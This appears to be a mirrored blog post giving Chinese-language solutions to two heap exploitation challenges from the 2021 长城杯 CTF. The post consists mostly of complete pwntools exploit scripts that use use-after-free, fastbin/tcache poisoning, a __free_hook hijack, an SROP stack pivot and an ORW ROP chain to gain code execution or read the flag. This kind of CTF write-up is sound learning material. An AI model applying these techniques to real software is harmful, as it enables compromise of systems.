0
长城杯 2021 Pwn
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/09/20/ccb/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
许久未见我这水平能做的堆了…
K1ng_in_h3Ap_I
uaf直接写fastbin的fd,没有简单的leak,rtld_global上面找了一个0x7f,不断的往下写,要写4次,复用3848的exit的函数指针高字节,写底3字节到one_gadget。
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF("./pwn")
libc = ELF("./libc.so")
#io = process(myelf.path,env={"LD_PRELOAD" : libc.path})
#io = process(myelf.path)
io = remote("47.104.175.110",20066)
sla = lambda delim,data : io.sendlineafter(delim,data)
add = lambda idx,size : (sla(">>","1"),sla(":",str(idx)),sla(":",str(size)))
free = lambda idx : (sla(">>","2"),sla(":",str(idx)))
edit = lambda idx,data : (sla(">>","3"),sla(":",str(idx)),sla(":",str(data)))
leak = lambda : (sla(">>","666"))
leak()
io.recvline()
libc.address = int(io.recvline(),16) - libc.symbols['printf']
log.success(hex(libc.address))
def aaw_on_libc(pad1,pad2,addr,data):
add(5,pad1)
add(0,0x60)
add(1,0x60)
add(2,240)
add(3,0x60)
free(2)
add(4,0x60)
free(0)
free(1)
free(0)
edit(0,pad2)
edit(4,addr)
add(7,0x60)
add(7,0x60)
add(7,0x60)
edit(7,data)
add(8,0x80)
one_gadget = libc.address + 0xf1247
rtld_global = libc.address + 0x5f0040
exit_1_addr = rtld_global + 3493
exit_2_addr = rtld_global + 3596
exit_3_addr = rtld_global + 3699
exit_4_addr = rtld_global + 3802
aaw_on_libc(0x80,"\x70",p32(exit_1_addr)[:3],'\x00'*0x5f+'\x7f')
aaw_on_libc(0xb0,"\x80",p32(exit_2_addr)[:3],'\x00'*0x5f+'\x7f')
aaw_on_libc(0xb0,"\x90",p32(exit_3_addr)[:3],'\x00'*0x5f+'\x7f')
aaw_on_libc(0xb0,"\xa0",p32(exit_4_addr)[:3],"\x00"*30+p32(one_gadget)[:3])
free(100)
io.interactive()
K1ng_in_h3Ap_II
任意edit任意show,禁了execve,SROP作栈迁移,ORW
from pwn import *
context(os='linux', arch='amd64',log_level='debug')
myelf = ELF('./pwn')
libc = ELF('./libc.so')
io = process(myelf.path,env={"LD_PRELOAD" : libc.path})
sla = lambda delim,data : io.sendlineafter(delim,data)
add = lambda idx,size : (sla(">>","1"),sla(":",str(idx)),sla(":",str(size)))
free = lambda idx : (sla(">>","2"),sla(":",str(idx)))
edit = lambda idx,data : (sla(">>","3"),sla(":",str(idx)),sla(":",str(data)))
show = lambda idx : (sla(">>","4"),sla(":",str(idx)))
uu64 = lambda data : u64(data.ljust(8, b'\0'))
# leak heap
add(0,0x60)
show(0)
io.recvuntil(b'\n')
heap = uu64(io.recv(6)) - 0xb20
log.success(hex(heap))
# leak libc
add(1,0x50)
free(1)
edit(1, p64(heap+0x2a0))
add(1, 0x50)
add(1, 0x50)
show(1)
io.recv()
libc.address = uu64(io.recv(6)) + 0x1620
log.success(hex(libc.address))
def aaw(addr,data,idx,size):
add(idx,size)
free(idx)
edit(idx,p64(addr))
add(idx,size)
add(idx,size)
edit(idx,data)
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = heap+0x500
frame.rdx = 0x1000
frame.rip = libc.sym['read']
frame.rsp = heap+0x500
aaw(heap+0x200,bytes(frame)[:0x60],2,0x60)
aaw(heap+0x260,bytes(frame)[0x60:0xc0],2,0x60)
aaw(heap+0x2c0,bytes(frame)[0xc0:],2,0x40)
aaw(heap+0x200,"",3,0x30)
aaw(libc.symbols["__free_hook"],p64(libc.sym['setcontext'] + 53),2,0x20)
free(3)
r = ROP(libc, base=heap+0x500)
r.call('open', ['./flag', 0, 0])
r.call('read', [3, heap+0x900, 0x100])
r.call('write', [1, heap+0x900, 0x100])
io.sendline(flat(r.build()))
io.interactive()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK